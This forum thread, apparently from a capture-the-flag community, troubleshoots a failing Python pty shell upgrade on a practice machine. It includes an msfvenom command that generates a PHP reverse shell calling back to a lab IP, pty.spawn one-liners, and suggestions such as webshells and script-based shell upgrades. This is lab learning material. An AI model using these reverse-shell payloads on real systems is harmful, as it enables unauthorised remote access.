Python pty.spawn not working

I’m at the point where I have a reverse php shell using netcat, and when I try to spawn a shell using “python -c import pty; pty.spawn(’/bin/bash’);” my shell does not spawn. The shell either becomes unresponsive or just nothing happens and I’m left with the default shell. I know this should work on this machine and that this is exactly when/where others have run the same command successfully. I am newer to pentesting so is there another reason that this may not be working correctly? Thanks

Check if python is actually present, or if python3 is. Run that command accordingly.

Also it should be

python -c 'import pty; pty.spawn("/bin/sh")'

I’m positive that it’s present. Just my command doesn’t work when I am literally watching an IppSec video where his does

Well he’s using /bin/bash, but I did try both, same result unfortunately

@JWindy92 your command above was in the incorrect format. See @thesithlord's above. Quotes are very important.

Well, I’ve tried the single and double quotes in both orientations, and that was a typo in the post, but in my console I was not missing the second quotation around /bin/bash.

I’ve edited the original

@JWindy92 said:

I’ve edited the original

Your edited one still has a typo.

Can you check you’ve run python -c 'import pty; pty.spawn("/bin/sh")' - note single quote after the -c and double quotes around /bin/bash?

Yea I was already certain I had run it both ways just to make sure, but I just went and checked again, copy and pasted your command, and still nothing. My shell doesn’t exit necessarily, just seems to kind of hang

Ok - that is a little bit odd.

For clarity, when you run python -c import pty; pty.spawn("/bin/sh") it should hang because all you’ve done is run python -c import pty and then tried to issue a python command to the shell interpreter.

However if you have enclosed the whole string, it should be treated as a blob to pass to python. This doesn’t always work (I find “shell upgrades” break often enough that I only do them if I really, really need to), but I get you are following a walkthrough where it is used, so it should work unless something on the box has changed since then.

Try it with a bash shell to see if that makes a difference.
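The quoting question discussed in the replies above, as an added example that is not part of the original thread: a simplified model of POSIX shell word splitting that reports what ends up as the `-c` argument for each form of the command. The function names and sample lines are constructed here, and only single and double quotes are modelled.

```python
SMART_QUOTES = "\u2018\u2019\u201c\u201d"   # typographic quotes: ordinary characters to a shell
OPERATORS = ";()|&<>"                        # end a word when they appear unquoted

def tokenize(line):
    """Split a line into (kind, text) tokens, kind "word" or "op", like a POSIX shell."""
    # Simplified model: '...' and "..." only; backslashes and $-expansion are ignored.
    tokens, cur, quote, in_word = [], [], None, False
    for ch in line:
        if quote:                          # inside quotes everything is literal
            if ch == quote:
                quote = None
            else:
                cur.append(ch)
        elif ch in "'\"":                  # an opening quote starts or continues a word
            quote, in_word = ch, True
        elif ch.isspace() or ch in OPERATORS:
            if in_word:
                tokens.append(("word", "".join(cur)))
            cur, in_word = [], False
            if ch in OPERATORS:
                tokens.append(("op", ch))
        else:
            cur.append(ch)
            in_word = True
    if in_word:
        tokens.append(("word", "".join(cur)))
    return tokens

def diagnose(line):
    """Report the word the interpreter receives after -c, plus quoting problems."""
    tokens = tokenize(line)
    code = None
    for (kind, text), nxt in zip(tokens, tokens[1:]):
        if kind == "word" and text == "-c" and nxt[0] == "word":
            code = nxt[1]
            break
    ops = [t for k, t in tokens if k == "op"]
    return {"code": code, "unquoted_operators": ops,
            "smart_quotes": any(c in SMART_QUOTES for c in line)}

# Constructed inputs: the three forms of the command that appear in the thread.
SAMPLES = {
    "unquoted": 'python -c import pty; pty.spawn("/bin/sh")',
    "quoted": "python -c 'import pty; pty.spawn(\"/bin/sh\")'",
    "smart": 'python -c \u2018import pty; pty.spawn("/bin/sh")\u2019',
}
if __name__ == "__main__":
    for name, line in SAMPLES.items():
        print(name, diagnose(line))
```

Only the form with straight single quotes delivers the whole snippet as one `-c` argument; a command copied from a page that rendered the quotes typographically behaves like the unquoted one.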

I was using a bash shell, but I tried both for the sake of being thorough. I’m not even following the walkthrough necessarily in order to exploit the machine. The only reason I pulled it up in the first place was because my shell upgrade wasn’t working and I wanted to double check that I wasn’t doing anything wrong. However we both get a shell via nc, and running the code on the machine, then his upgrade works and mine doesn’t. So I’m just at a loss.

Again I’m new, this is the msfvenom command I’m using,
msfvenom -p php/reverse_php LHOST=10.10.14.54 LPORT=1234 -f raw > shell2.htb

any red flags there?

EDIT: I guess I should mention the .htb extension is being run as .php by the server. Not sure if you would know/remember that if you maybe haven’t done the box before or in a while since you’re more advanced than I am

What is the machine?

I’ve had trouble with msf PHP shells before where I couldn’t run certain interactive commands. I try to stay away from them when I can. It’s been a while though since I’ve seen this.
You could try getting a shell through another method (e.g. a simple php webshell and then running a reverse shell one-liner as the command).

@TazWake said:
What is the machine?

I just try to run following on the foothold of Magic, not working.
python3 -c 'import pty; pty.spawn("/bin/sh")'

@6uta said:

I just try to run following on the foothold of Magic, not working.
python3 -c 'import pty; pty.spawn("/bin/sh")'

Hey. The command is right.
Try socat interactive shell, if python/python3 is not present.
But I’m sure your command is right.

What response exactly do you get after executing the python pty script?

@zaicurity said:

I’ve had trouble with msf PHP shells before where I couldn’t run certain interactive commands. I try to stay away from them when I can. It’s been a while though since I’ve seen this.
You could try getting a shell through another method (e.g. a simple php webshell and then running a reverse shell one-liner as the command).

Maybe because I don’t know it well enough, but I never understood the fuss of metasploit: it’s confusing that it’s like a shell but not really and if you get used to it: on any half decent windows machine the av will pick it up and throw you out.
Never even thought of using it. I just don’t like to use stuff that I don’t know what it’s doing exactly… The benefits I know of don’t compare to all the downsides I experienced with it.

That being said: @6uta, you generated a meterpreter payload, and you try to upgrade that session to one with auto complete. That it?

Not sure if meterpreter can. My suggestion would be to stay away from meterpreter sessions whenever you have a choice.

@6uta said:

I just try to run following on the foothold of Magic, not working.
python3 -c 'import pty; pty.spawn("/bin/sh")'

That should work on Magic. When you say it is “not working” , what actually happens? Does nothing happen or do you get an error message?

@gnothiseauton

Maybe because I don’t know it well enough, but I never understood the fuss of metasploit:

I agree. Sometimes it can make life easier but all too often the varying payloads just confuse people. People expect everything to be a meterpreter shell but it rarely works that way.

If you need a shell that can use su or sudo, you can use /usr/bin/script -qc /bin/bash /dev/null on any Linux box as far as I know. It won’t give you tab complete or command history, though.

@TazWake agreed man.